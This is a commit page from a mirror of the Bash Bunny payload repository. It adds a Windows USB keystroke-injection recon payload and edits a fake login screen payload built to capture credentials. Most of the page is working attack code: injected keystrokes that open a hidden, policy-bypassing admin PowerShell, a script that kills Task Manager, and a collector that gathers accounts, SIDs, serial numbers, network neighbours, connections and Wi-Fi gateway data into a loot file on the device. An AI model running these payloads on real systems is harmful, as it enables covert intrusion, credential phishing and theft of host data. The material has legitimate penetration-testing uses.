hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

New Payload: Win_PoSH_WordReport, Fix typos in Win_PoSH_FakeLoginScreen (#431)

Browse Source 
* Add files via upload

* Update readme.md

* Update payload.txt

* Update readme.md

* Update readme.md

* Update readme.md

* Update readme.md

* Update readme.md

* Add files via upload

* Update readme.md

* Update readme.md

* Add Payload WIN_PoSH_HKU_RegBackUp

* Update readme.md

* Update payload.txt

* Change for admin shell

* Update readme.md

* Update payload.txt

* Update payload.txt

* Update readme.md

* Added payload WIN_PoSH_SaveSecurityHive

Added new payload to exfiltration that saves the HKLM security hive to the bunny

* Morse Code File Exfiltration

A bit pointless with limitation of morse code but I thought it was fun to create.

* Update readme.md

* Update for non-alphanumeric

* Update for timing

* Update readme.md

* Update readme.md

* Update readme.md

* Update readme.md

* Update payload.txt

* New payload - Fake Login

Shows a fake version of the windows 10 login screen

* Update readme.md

* Changes to Fake Login Payload

* Changes to Fake Login

* Win_PoSH_FakeLogin: Changes to payload and readme

* New recon payload: Win_PoSH_WordReport

* Update fixed typo: Win_PoSH_WordReport
This commit is contained in:
cribb-it 2021-04-30 17:02:21 +01:00 committed by GitHub
parent 7a0d036b74
commit 8cd8d859cd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
5 changed files with 387 additions and 21 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

42
payloads/library/credentials/Win_PoSH_FakeLogin/payload.txt
View File

@ -1,20 +1,22 @@
# Title: Fake Login # Title: Fake Login
# Description: Shows a fake login screen # Description: Shows a fake login screen
# Author: Cribbit # Author: Cribbit
# Version: 1.0 # Version: 1.0
# Category: Credentials # Category: Credentials
# Target: Windows (Powershell 5.1+) # Target: Windows (Powershell 5.1+)
# Attackmodes: HID & STORAGE # Attackmodes: HID & STORAGE
# Extensions: Run # Extensions: Run
LED SETUP LED SETUP
GET SWITCH_POSITION GET SWITCH_POSITION
ATTACKMODE HID STORAGE VID_0X05AC PID_0X021E ATTACKMODE HID STORAGE
LED ATTACK QUACK DELAY 500
RUN WIN "powerShell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\L.ps1')" LED ATTACK
LED FINISH RUN WIN "powershell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\L.ps1')"
LED FINISH

2
payloads/library/credentials/Win_PoSH_FakeLogin/readme.md
View File

@ -21,7 +21,7 @@ If you do not wish to use them you could have the files on the bunny and do some
```powershell ```powershell
$BGImg = [System.Drawing.Image]::FromFile(<PathToBunny>"bg.jpg"); $BGImg = [System.Drawing.Image]::FromFile(<PathToBunny>"bg.jpg");
``` ```
or if you have web hosting or a http server runing on the bunny then you can do something like: or if you have web hosting or a http server running on the bunny then you can do something like:
```powershell ```powershell
$R = Invoke-WebRequest 'https://<MyURL/IPAddress>/bg.jpg'; $R = Invoke-WebRequest 'https://<MyURL/IPAddress>/bg.jpg';
$BGImg = [System.Drawing.Image]::FromStream($R.RawContentStream); $BGImg = [System.Drawing.Image]::FromStream($R.RawContentStream);

300
payloads/library/recon/Win_PoSH_WordReport/Recon.ps1 Normal file
View File

@ -0,0 +1,300 @@
Function New-WordTable {
[cmdletbinding(
DefaultParameterSetName='Table'
)]
Param (
[parameter()]
[object]$WordObject,
[parameter()]
[object]$Object,
[parameter()]
[int]$Columns,
[parameter()]
[int]$Rows,
[parameter(ParameterSetName='Table')]
[switch]$AsTable,
[parameter(ParameterSetName='List')]
[switch]$AsList,
[parameter()]
[string]$TableStyle,
[parameter()]
[Microsoft.Office.Interop.Word.WdDefaultTableBehavior]$TableBehavior = 'wdWord9TableBehavior',
[parameter()]
[Microsoft.Office.Interop.Word.WdAutoFitBehavior]$AutoFitBehavior = 'wdAutoFitContent'
)
#Specifying 0 index ensures we get accurate data from a single object
$Properties = $Object[0].psobject.properties.name
$Range = @($WordObject.Paragraphs)[-1].Range
$Table = $WordObject.Tables.add(
$WordObject.Range,$Rows,$Columns,$TableBehavior, $AutoFitBehavior)
Switch ($PSCmdlet.ParameterSetName) {
'Table' {
If (-NOT $PSBoundParameters.ContainsKey('TableStyle')) {
#$Table.Style = "Medium Shading 1 - Accent 1"
$Table.Style = "Grid Table 4 - Accent 1"
}
$c = 1
$r = 1
#Build header
$Properties | ForEach {
Write-Verbose "Adding $($_)"
$Table.cell(($r),($c)).range.Bold=1
$Table.cell($r,$c).range.text = $_
$c++
}
$c = 1
#Add Data
For ($i=0; $i -lt (($Object | Measure-Object).Count); $i++) {
$Properties | ForEach {
$Table.cell(($i+2),$c).range.Bold=0
$Table.cell(($i+2),$c).range.text = [string]$Object[$i].$_
$c++
}
$c = 1
}
}
'List' {
If (-NOT $PSBoundParameters.ContainsKey('TableStyle')) {
$Table.Style = "Light Shading - Accent 1"
}
$c = 1
$r = 1
$Properties | ForEach {
$Table.cell($r,$c).range.Bold=1
$Table.cell($r,$c).range.text = $_
$c++
$Table.cell($r,$c).range.Bold=0
$Table.cell($r,$c).range.text = $Object.$_
$c--
$r++
}
}
}
}
Function val2addr($val){
$addr="";
foreach($i in $val){
$addr += "{0:x2} " -f $i
}
$addr.Trim().Replace(' ', ':');
}
Stop-Process -Name "Taskmgr"
$Word = New-Object -ComObject Word.Application
#$Word.Visible = $True
$Document = $Word.Documents.Add()
$Selection = $Word.Selection
$Selection.Style = 'Title'
$Selection.TypeText("PC Info Report")
$Selection.TypeParagraph()
$Selection.Style = 'Heading 1'
$Selection.TypeText("Details")
$Selection.TypeParagraph()
$selection.TypeText("Hostname: $($env:COMPUTERNAME)")
$Selection.TypeParagraph()
$selection.TypeText("User: $($env:USERNAME)")
$selection.TypeParagraph()
$selection.TypeText("Date: $(Get-Date -Format "dddd dd MMMM yyyy hh:mm:ss")")
$selection.TypeParagraph()
#OS Info
$OS = @(Get-CimInstance -ClassName Win32_OperatingSystem | ForEach {
[pscustomobject] @{
Name = $_.Caption
Version = $_.Version
BuildNumber = $_.BuildNumber
Architecture = $_.OSArchitecture
SerialNumber = $_.SerialNumber
}
})
$Selection.Style = 'Heading 2'
$Selection.TypeText("OS")
New-WordTable -WordObject $Selection -Object $OS -Columns 2 -Rows 5 -AsList
$Word.Selection.Start= $Document.Content.End
#BIOS Info
$BIOS = @(Get-WmiObject Win32_Bios | ForEach {
[pscustomobject] @{
Manufacturer = $_.Manufacturer
Name = $_.Name
Version = $_.Version
SerialNumber = $_.SerialNumber
BIOSVersion = $_.SMBIOSBIOSVersion
}
})
$Selection.TypeParagraph()
$Selection.Style = 'Heading 2'
$Selection.TypeText("BIOS")
$Selection.TypeParagraph()
New-WordTable -WordObject $Selection -Object $BIOS -Columns 2 -Rows ($BIOS.PSObject.Properties | Measure-Object).Count -AsList
$Word.Selection.Start= $Document.Content.End
#HDD Info
$DriveType = @{
0x0 = 'Unknown'
0x1 = 'No Root Directory'
0x2 = 'Removable Disk'
0x3 = 'Local Disk'
0x4 = 'Network Drive'
0x5 = 'Compact Disk'
0x6 = 'RAM Disk'
}
$Volume = @(Get-WmiObject Win32_Volume | Sort-Object -Property Name | ForEach {
[pscustomobject]@{
Drive = $_.Name
DriveType = $DriveType[[int]$_.DriveType]
Label = $_.label
FileSystem = $_.FileSystem
'FreeSpace(GB)' = '{0:N2}' -f ($_.FreeSpace /1GB)
'Capacity(GB)' = '{0:N2}' -f ($_.Capacity/1GB)
}
})
$Selection.TypeParagraph()
$Selection.Style = 'Heading 2'
$Selection.TypeText("Drives")
$Selection.TypeParagraph()
New-WordTable -WordObject $Selection -Object $Volume -Columns 6 -Rows ($Volume.Count+1) AsTable
$Word.Selection.Start= $Document.Content.End
$SU = (Get-CimInstance -ClassName Win32_StartupCommand | Select-Object -Property Name, User, Command, Location)
$Selection.TypeParagraph()
$Selection.Style = 'Heading 2'
$Selection.TypeText("Start Up")
$Selection.TypeParagraph()
New-WordTable -WordObject $Selection -Object $SU -Columns 4 -Rows ($SU.Count+1) -AsTable
$Word.Selection.Start= $Document.Content.End
$UA =Get-WmiObject -Class Win32_UserAccount | Select-Object Caption, Domain, Name, FullName, SID
$Selection.TypeParagraph()
$Selection.Style = 'Heading 2'
$Selection.TypeText("User Accounts")
$Selection.TypeParagraph()
New-WordTable -WordObject $Selection -Object $UA -Columns 5 -Rows ($UA.Count+1) -AsTable
$Word.Selection.Start= $Document.Content.End
$Selection.Style = 'Heading 1'
$Selection.TypeText("Networking")
$NAC = (Get-CimInstance -ClassName Win32_NetworkAdapterConfiguration -Filter "IPEnabled='True'" | Select-Object -Property Description, MACAddress, IPAddress, DefaultIPGateway)
$Selection.TypeParagraph()
$Selection.Style = 'Heading 2'
$Selection.TypeText("Network Adapters")
$Selection.TypeParagraph()
New-WordTable -WordObject $Selection -Object $NAC -Columns 4 -Rows ($NAC.Count+1) -AsTable
$Word.Selection.Start= $Document.Content.End
$NW = (Get-NetNeighbor | Where-Object State -NE Unreachable | Select-Object -Property InterfaceAlias,IPAddress, LinkLayerAddress, State, Store)
$Selection.TypeParagraph()
$Selection.Style = 'Heading 2'
$Selection.TypeText("Network")
$Selection.TypeParagraph()
New-WordTable -WordObject $Selection -Object $NW -Columns 5 -Rows ($NW.Count+1) -AsTable
$Word.Selection.Start= $Document.Content.End
# Arp Info
$ARP = (arp -a | ConvertFrom-String -PropertyNames ('Type', 'Internet', 'Address', 'Physical'))
$Selection.TypeParagraph()
$Selection.Style = 'Heading 2'
$Selection.TypeText("ARP")
$Selection.TypeParagraph()
New-WordTable -WordObject $Selection -Object $ARP -Columns 4 -Rows ($ARP.Count+1) -AsTable
$Word.Selection.Start= $Document.Content.End
$process = Get-Process | Select-Object -Property Id, Name, Company, ProductVersion, Path
# Get Listeners / ActiveTcpConnections
$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess
$listener = $listener | foreach-object {
$listenerItem = $_
$processItem = ($process | where { [int]$_.Id -like [int]$listenerItem.OwningProcess })
new-object PSObject -property @{
"LocalAddress" = $listenerItem.LocalAddress
"RemoteAddress" = $listenerItem.RemoteAddress
"State" = $listenerItem.State
"AppliedSetting" = $listenerItem.AppliedSetting
"OwningProcess" = $listenerItem.OwningProcess
"ProcessName" = $processItem.Name
}
} | select-Object LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress
$Selection.TypeParagraph()
$Selection.Style = 'Heading 2'
$Selection.TypeText("Listeners / ActiveTcpConnections")
$Selection.TypeParagraph()
New-WordTable -WordObject $Selection -Object $listener -Columns 6 -Rows ($listener.Count+1) -AsTable
$Word.Selection.Start= $Document.Content.End
$ND = (Get-CimInstance -ClassName Win32_NTDomain | Select-Object -Property ClientSiteName, DcSiteName, Description, DnsForestName, DomainControllerAddress, DomainControllerName, DomainName, Roles, Status)
$Selection.TypeParagraph()
$Selection.Style = 'Heading 2'
$Selection.TypeText("NT Domain")
$Selection.TypeParagraph()
New-WordTable -WordObject $Selection -Object $ND -Columns 2 -Rows ($ND.PSObject.Properties | Measure-Object).Count -AsList
$Word.Selection.Start= $Document.Content.End
$location = $PWD
cd 'hklm:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged'
$Mac = gci | % { $name=$_.GetValue('Description'); $mac=val2addr($_.GetValue('DefaultGatewayMac')); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;MAC_ADDRESS=$mac }}
cd $location
$Selection.TypeParagraph()
$Selection.Style = 'Heading 2'
$Selection.TypeText("Reg Access Points")
$Selection.TypeParagraph()
New-WordTable -WordObject $Selection -Object $Mac -Columns 2 -Rows ($Mac.Count+1) -AsTable
$Word.Selection.Start= $Document.Content.End
$Selection.Style = 'Heading 1'
$Selection.TypeText("Software")
$Selection.TypeParagraph()
$Selection.Style = 'Heading 2'
$Selection.TypeText("Current running process")
$Selection.TypeParagraph()
New-WordTable -WordObject $Selection -Object $process -Columns 5 -Rows ($process.Count+1) -AsTable
$Word.Selection.Start= $Document.Content.End
<#$PE = Get-WmiObject -Namespace root\cimv2 -Class CIM_ProcessExecutable | %{try{[wmi]($_.Antecedent)}catch {$null}} | Select FileName,Extension,Manufacturer,Version -ErrorAction SilentlyContinue
$Selection.TypeParagraph()
$Selection.Style = 'Heading 2'
$Selection.TypeText("CIM Process Executables")
$Selection.TypeParagraph()
New-WordTable -WordObject $Selection -Object $PE -Columns 4 -Rows ($PE.Count+1) -AsTable
$Word.Selection.Start= $Document.Content.End#>
$Selection.Style = 'Heading 1'
$Selection.TypeText("Environment Variables")
$Selection.TypeParagraph()
$envPath = $env:Path -split ";" | %{"{0}`n" -f $_}
$Selection.Style = 'Normal'
$Selection.TypeText("Path:")
$Selection.TypeParagraph()
$Selection.TypeText($envPath)
$Selection.TypeParagraph()
$Report = ((gwmi win32_volume -f 'label=''BashBunny''').Name + "loot\Report_$env:COMPUTERNAME.docx");
$Document.SaveAs([ref]$Report,[ref]$SaveFormat::wdFormatDocument)
$Word.Quit()
$null = [System.Runtime.InteropServices.Marshal]::ReleaseComObject([System.__ComObject]$Word)
$o = New-Object -com wscript.shell;
$o.SendKeys('{SCROLLLOCK}');
sleep 1;
$o.SendKeys('{SCROLLLOCK}');
sleep 1;
$o.SendKeys('{SCROLLLOCK}');
sleep 1;
$o.SendKeys('{SCROLLLOCK}');
$null = [System.Runtime.InteropServices.Marshal]::ReleaseComObject([System.__ComObject]$o)
[gc]::Collect()
[gc]::WaitForPendingFinalizers()
Remove-Variable -Name Word, OS, BIOS, DriveType, Volume, SU,
UA,NAC,NW,ARP, process, listener,listenerItem, processItem,
ND, envPath, PE, Mac, location, o -ErrorAction SilentlyContinue -Force

35
payloads/library/recon/Win_PoSH_WordReport/payload.txt Normal file
View File

@ -0,0 +1,35 @@
# Title: Word Report
# Description: This payload in similar to the InfoGrabber payload. But save slightly different info to a MS Word document.
# Author: Cribbit
# Version: 1.0
# Category: Recon
# Target: Windows (Powershell 5.1+)
# Attackmodes: HID & STORAGE
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
LED ATTACK
Q DELAY 200
# Opens Task Manager
Q CTRL-SHIFT ESC
Q DELAY 100
# Selects "&File"
Q ALT f
# Selects "Run &new task"
Q STRING n
Q DELAY 100
Q STRING "powershell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Recon.ps1')"
# Set Create this task with administrative privileges
Q DELAY 100
Q TAB
Q DELAY 100
Q SPACE
Q DELAY 100
# Run
Q ENTER
LED FINISH

29
payloads/library/recon/Win_PoSH_WordReport/readme.md Normal file
View File

@ -0,0 +1,29 @@
# Word Report
- Author: Cribbit
- Version: 1.0
- Target: Windows (Powershell 5.1+)
- Category: Recon
- Attackmode: HID & Storage
- Extensions: Run
- Props: Don Murdoch, Boe Prox, Simen Kjeserud, DannyK999 & T.J. Connor
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
This payload in similar to the [InfoGrabber](https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/InfoGrabber) payload. But save the info to a MS Word document and collects some different data.
This payload needs an admin powershell prompt to run
## Configuration
This payload is written for an English version of windows. You will need to update the letters used when accessing the menu with ALT for other languages
## Colours
| Status | Colour | Description |
| -------- | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| INJECTED | Green blink followed by SOLID | Injection finished |
| FINISHED | Blinks the scroll lock twice | Script is finished |